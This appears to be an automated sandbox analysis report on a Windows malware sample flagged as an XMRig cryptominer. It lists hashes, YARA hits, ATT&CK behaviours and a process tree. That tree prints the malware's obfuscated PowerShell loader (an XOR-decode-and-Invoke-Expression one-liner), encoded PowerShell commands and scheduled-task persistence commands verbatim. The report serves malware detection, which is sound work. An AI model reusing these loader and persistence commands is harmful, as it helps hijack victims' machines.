Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25/10/2024, 13:31
Static task
static1
Behavioral task
behavioral1
Sample
2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe
-
Size
3.1MB
-
MD5
64bf0cc952e3709e7b47e411780a94c8
-
SHA1
ce17b54a681c1b7ad11a426ef1b8965303c1da38
-
SHA256
23d959b6953113b4c9b674c6f8eb41d65e8504d3db4f8c3045df4a59563b2c7b
-
SHA512
0e08968828f0eb2b89bcf297be3e250e31520c2ee78128a36fc2a3d83f0c93dff27f953385c2fa38b3be491d5cb27748c17e882786f33aad6d15c4340d0eefd1
-
SSDEEP
98304:4MDtIXLr06AdfEThF35Pzu7Q9mbkqKkodM3:ormEdF3iQ9mgqKkV
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/files/0x0008000000023ccf-30.dat xmrig behavioral2/memory/1068-59-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/1068-62-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/1068-1252-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/1068-1254-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/1068-1256-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/1068-1264-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/1068-1266-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/1068-1268-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig behavioral2/memory/1068-1272-0x0000000000400000-0x0000000000AA3000-memory.dmp xmrig -
Blocklisted process makes network request 3 IoCs
flow pid Process 45 1712 powershell.exe 47 1712 powershell.exe 49 1712 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation maintenance.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe -
Executes dropped EXE 6 IoCs
pid Process 2068 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe 2112 maintenance.exe 1068 idle_maintenance.exe 1896 wmntnnc 4344 wmntnnc 208 maintenance.exe -
Loads dropped DLL 60 IoCs
pid Process 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
pid Process 1712 powershell.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0008000000023cd5-68.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmntnnc Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language maintenance.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmntnnc Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language maintenance.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3272 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2272 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 2112 maintenance.exe 2112 maintenance.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 4456 powershell.exe 4456 powershell.exe 4700 powershell.exe 4700 powershell.exe 4236 powershell.exe 4236 powershell.exe 4456 powershell.exe 4700 powershell.exe 4236 powershell.exe 4456 powershell.exe 4456 powershell.exe 4344 wmntnnc 4344 wmntnnc -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeLockMemoryPrivilege 1068 idle_maintenance.exe Token: SeLockMemoryPrivilege 1068 idle_maintenance.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 4456 powershell.exe Token: SeDebugPrivilege 4700 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4344 wmntnnc 4344 wmntnnc 4344 wmntnnc -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2068 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe 2068 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe 4344 wmntnnc -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 1364 wrote to memory of 4328 1364 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe 84 PID 1364 wrote to memory of 4328 1364 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe 84 PID 1364 wrote to memory of 4328 1364 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe 84 PID 1364 wrote to memory of 4752 1364 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe 86 PID 1364 wrote to memory of 4752 1364 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe 86 PID 1364 wrote to memory of 4752 1364 2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe 86 PID 4328 wrote to memory of 4116 4328 cmd.exe 88 PID 4328 wrote to memory of 4116 4328 cmd.exe 88 PID 4328 wrote to memory of 4116 4328 cmd.exe 88 PID 4752 wrote to memory of 2896 4752 cmd.exe 89 PID 4752 wrote to memory of 2896 4752 cmd.exe 89 PID 4752 wrote to memory of 2896 4752 cmd.exe 89 PID 4328 wrote to memory of 2272 4328 cmd.exe 90 PID 4328 wrote to memory of 2272 4328 cmd.exe 90 PID 4328 wrote to memory of 2272 4328 cmd.exe 90 PID 4752 wrote to memory of 2068 4752 cmd.exe 91 PID 4752 wrote to memory of 2068 4752 cmd.exe 91 PID 4752 wrote to memory of 2068 4752 cmd.exe 91 PID 4752 wrote to memory of 3272 4752 cmd.exe 92 PID 4752 wrote to memory of 3272 4752 cmd.exe 92 PID 4752 wrote to memory of 3272 4752 cmd.exe 92 PID 2112 wrote to memory of 1068 2112 maintenance.exe 112 PID 2112 wrote to memory of 1068 2112 maintenance.exe 112 PID 2112 wrote to memory of 1712 2112 maintenance.exe 114 PID 2112 wrote to memory of 1712 2112 maintenance.exe 114 PID 2112 wrote to memory of 1712 2112 maintenance.exe 114 PID 1712 wrote to memory of 4456 1712 powershell.exe 121 PID 1712 wrote to memory of 4456 1712 powershell.exe 121 PID 1712 wrote to memory of 4456 1712 powershell.exe 121 PID 1712 wrote to memory of 1896 1712 powershell.exe 122 PID 1712 wrote to memory of 1896 1712 powershell.exe 122 PID 1712 wrote to memory of 1896 1712 powershell.exe 122 PID 1712 wrote to memory of 4236 1712 powershell.exe 123 PID 1712 wrote to memory of 4236 1712 powershell.exe 123 PID 1712 wrote to memory of 4236 1712 powershell.exe 123 PID 1712 wrote to memory of 4700 1712 powershell.exe 124 PID 1712 wrote to memory of 4700 1712 powershell.exe 124 PID 1712 wrote to memory of 4700 1712 powershell.exe 124 PID 1896 wrote to memory of 4344 1896 wmntnnc 125 PID 1896 wrote to memory of 4344 1896 wmntnnc 125 PID 1896 wrote to memory of 4344 1896 wmntnnc 125 PID 4700 wrote to memory of 208 4700 powershell.exe 126 PID 4700 wrote to memory of 208 4700 powershell.exe 126 PID 4700 wrote to memory of 208 4700 powershell.exe 126
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe20241025133118446.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\schtasks.exeSchtasks.Exe /delete /tn "Maintenance" /f3⤵
- System Location Discovery: System Language Discovery
PID:4116
-
-
C:\Windows\SysWOW64\schtasks.exeSchtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20241025133118446.xml"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb20241025133118446.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
- System Location Discovery: System Language Discovery
PID:2896
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-25_64bf0cc952e3709e7b47e411780a94c8_icedid_nymaim.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2068
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak3⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3272
-
-
-
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exeC:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe .1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Users\Admin\AppData\Local\Temp\4f4647414455534547205988590859817822720016\idle_maintenance.exeC:\Users\Admin\AppData\Local\Temp\4f4647414455534547205988590859817822720016\idle_maintenance.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -c "if($host.version.major -lt 3){exit}$d =[IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Roaming\Maintenance\mod');$l=$d.Count;$m = New-Object Byte[] $l;[byte[]] $x=6,237,36,106,196,101,232,222;$j=0;for($i=0;$i -lt $l;$i++){$m[$i]=$d[$i] -bxor $x[$j];$j++;if($j -ge 8){$j=0}}$a = New-Object IO.MemoryStream(,$m);$b = New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($a,[IO.Compression.CompressionMode]::Decompress));$c=$b.ReadToEnd();$b.Close();$a.Close();Invoke-Expression($c)"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand ZgB1AG4AYwB0AGkAbwBuACAAYwBoAGsAcAByAGMAKAAkAHAAKQB7AA0ACgAgACgAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAALQBjAG8AbgB0AGEAaQBuAHMAIAAiACQAcAAiACkADQAKAH0ADQAKAGkAZgAoAGMAaABrAHAAcgBjACgAJwBtAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwApACkAewANAAoAIABXAGEAaQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACcAbQBhAGkAbgB0AGUAbgBhAG4AYwBlACcADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHcAbQBuAHQAbgBuAGMAJwApACkAewANAAoAIAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcAIAAtAEYAbwByAGMAZQANAAoAIAAgAFcAYQBpAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcADQAKACAAfQAgAA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwAtACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwApACkAewBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEYAbwByAGMAZQB9AA0ACgAgAGUAeABpAHQADQAKAH0A3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4456
-
-
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc".\wmntnnc"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc".\wmntnnc"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4344
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand JABwAGEAdABoAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA0ACgANAAoAJABiAGkAbgBmAG4APQAwAA0ACgBkAG8AIAB7AA0ACgAgACQAZgBpAGwAZQBzACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAEYAaQBsAHQAZQByACAAXwBNAEUASQAqAA0ACgAgAEYAbwByAEUAYQBjAGgAIAAoACQAZgBuACAAaQBuACAAJABmAGkAbABlAHMAKQAgAHsADQAKACAAIAAkAGIAaQBuAGYAbgA9ACQAcABhAHQAaAArACcAXAAnACsAJABmAG4ALgBuAGEAbQBlACsAJwBcAFEAdABHAHUAaQA0AC4AZABsAGwAJwANAAoAIAB9AA0ACgAgAGkAZgAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADEAMAAwAH0ADQAKAH0ADQAKAHcAaABpAGwAZQAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAA0ACgANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACQAYgBpAG4AZgBuACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoADQAKACQAZgBzAD0AMAANAAoAZABvAHsADQAKACAAdAByAHkAewAkAGYAcwAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBXAHIAaQB0AGUAKAAkAGIAaQBuAGYAbgApAH0ADQAKACAAYwBhAHQAYwBoAHsAJABmAHMAPQAwAH0ADQAKACAAaQBmACgALQBuAG8AdAAgACQAZgBzACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAAfQANAAoAfQANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgACQAZgBzACkADQAKAA0ACgAkAGEAPQA1ADEANwA2ADEAOAA2AA0ACgAkAG4APQA0AA0ACgAkAGYAcwAuAFMAZQBlAGsAKAAkAGEALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAbgA7ACQAaQArACsAKQB7ACQAZgBzAC4AVwByAGkAdABlAEIAeQB0AGUAKAAwACkAfQANAAoAJABmAHMALgBDAGwAbwBzAGUAKAApACAADQAKAGUAeABpAHQA3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand dwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACcALgBcAHMAaQBuAGcAbABlAHQAbwBuAC4AbABvAGMAawAnACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAxADAAMAAwADsAJABpACsAKwApAA0ACgB7AA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwArACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAJABwAHIAdABjAC4AVwBhAGkAdABGAG8AcgBFAHgAaQB0ACgAKQANAAoAIAANAAoAIABpAGYAKAAkAHAAcgB0AGMALgBFAHgAaQB0AEMAbwBkAGUAIAAtAGUAcQAgADcANwA3ACkAewBiAHIAZQBhAGsAfQANAAoAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAADQAKACAAZQB4AGkAdAANAAoAfQA=3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe"C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe" +4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:208
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
3KB
MD5467df1eefbf67f1d0d1f566a96bc4734
SHA1878fa44a15f372712d9c95768e4af612b9b51b70
SHA256ab34fee79d2e388538c503b968eb618397f707061f6b777313bffdfa662cf165
SHA512e6414987b03cf662abbee85e92d672a2d5f4a740992dd98e6a9a0a4a25ee1b6b4d2f595be87bb63d57d65c23aa56944930ccefc861c02a0f4e98258a94dc3f7d
-
Filesize
3.5MB
MD5e2af153ed50cb5ef457972e656f1bc51
SHA1efe31f03ec2ce99ba4ff8d573734fc4259a28edf
SHA256043f0954abf32bf6d1669cf456a439accc7421af3ee7608e23c8e2b6e6a27c1c
SHA5122576c511868849ab258ef0bbe2fb3cbfe72eb02dc0ab5f4d7004d7a59ff5bfba035f54a2dc7ca55d569f51d2f4de654643fafa29905b32e1b1b498ff050c699e
-
Filesize
1KB
MD5664f2d313870b7a5221f64843b982ca6
SHA10aa6161f154f4c706b735ad94b98fc640eb22c8e
SHA256cb22d067d3131f5d5285ccf3d32132de5db9ae6d3e7ce07b423810ff608b1f0c
SHA5126a8faacbad176e435e37424ac84e0f5745cfd93165a0798c3eff8b2b16bc15d759e5cd95975783ed8f93f01a3d38dfedf6718ddcb6f17788297bee3933369894
-
Filesize
1.6MB
MD5b8fcffd511b6f1ad5c1bd56cecedd72b
SHA141a75f56566717bebb7fc0857a1ef5f8f3b5846e
SHA256a62a88f72c302e910b8d29ddb07fa635272dc71cd3ddfaef4d4b5332df87e08f
SHA512943069b98f8ec8d1835e888c484252ee3b229d9ab30a8a33892f6802164de2feb3827f80bed4e04a37a5251a6ae264fbe7ddcea87a877a6498eb0a42a91d63a8
-
Filesize
2.4MB
MD506393b89000d04d73d29c208bae4b624
SHA12039597ce0649ca6502ac8ed4277d4ae788388bd
SHA2560ccbc8d47c5677778b85d9625f2d2e9b49084572c984f60f6b6ce6f23a082c23
SHA512e717bbcea9572f33faf1448146ef454c5eb0e93286d7678d36023e694affad64fdd91622cb28b9610c02ab094249c8dd397b6283a89a9173b05358bb3af186d0
-
Filesize
89KB
MD5f1134b690b2dc0e6aa0f31be1ed9b05f
SHA19c27067c0070b9d9366da78c3d241b01ba1fa4ee
SHA256030bf1aaff316dfbb1b424d91b1340b331c2e38f3e874ae532284c6170d93e7e
SHA5127db97dd004c2d9ce28cd3856f32d96d3a2f696f922c188dbc1150ba35c9a859cdb8d5ed0264a437944ef0fb662f801e2af66f5ecce58c8ee9d2ebf852af8f170
-
Filesize
993KB
MD524c2f70ff5c6eaddb995f2cbb4bc4890
SHA1c6534a6eb3e1e38fe36332d430eb33eeeb8ecc73
SHA2568dceafaaec28740385b1cb8cf2655db68ecf2e561053bfe494795019542491e4
SHA512d262c1b9162f7fcd121fc4c46ce5e85b5ad0e88cadc075ae6fe157ab407fc8558f9860b2cfcae9ae6119bb631c8b978652d1a93e4c2d093b6e7385e81719acf3
-
Filesize
27KB
MD54f7cfe168ff9fb400cac099cf3336145
SHA1a0e74ed858ff443d02678fc7949ce51b549b7f3b
SHA2564bcdeb300f5b733ef09bdbe3befba8dfc1126cc349d48fd0c845ce633adbd924
SHA5121b07b5b205abefae3ef70c1aaec9464e6ee11b059e45f796b3e7e6eb630f5c95f748e4a143d0c9d5209367b8f5fbb7aed28f659e625fef2fda0834c250a9dd22
-
Filesize
45KB
MD5a9cc2ff4f9cb6f6f297c598e9f541564
SHA1e38159f04683f0e1ed22baba0e7dcc5a9bc09172
SHA25636a7dd2596598916384044b680d62fc7369d246703a57178c27c74214a78585f
SHA5129d99f546e5fa8c235fef007d8eca990350f35d11cd903c5d91611c133166845834c27b1c6a9132c71776754580d9e62fb5072ce6ada1f48feecbf408ca39026f
-
Filesize
49KB
MD5cf6e48afbad2a930775723387080d2c3
SHA15172b9e02a6fae1f1f5cb3d4433dc9c4fcd2e234
SHA256b355041828e249b476d198f5b245b89a32e1a857f401f137e768e6e2f8b5f687
SHA5122cf137de885cf06222197fd2d47dc53190824b0ba5470562f2e96910770a76b0f3233d8e3184120bb692c411915f814471e77caf5b447405ed77568da9508653
-
Filesize
69KB
MD59897fb7cfe7f78b4e4521d8d437bea0e
SHA1f7cd930bac39701349ef3043986be42a705da3ad
SHA256d99399bd6ca916c0490af907fb06530839d0797b18a997ed5c091393fc2292f8
SHA512ad310e30a58fc42ce9d1b5265c4041ce59ee8acebc4ec5e3ce58af8415423a09387f303e5111938f51f0dff7a44714917ca860788136f4962baf1fbe8cac1088
-
Filesize
1.2MB
MD5ceef7d25903265391c926978cd340d79
SHA196fa3c93219a6c601f1edccba8e8f34f62261a7d
SHA256c35382b8c55c06660ed6025c732e978edcfc20f08d06f5042c45a55fa88ff6ae
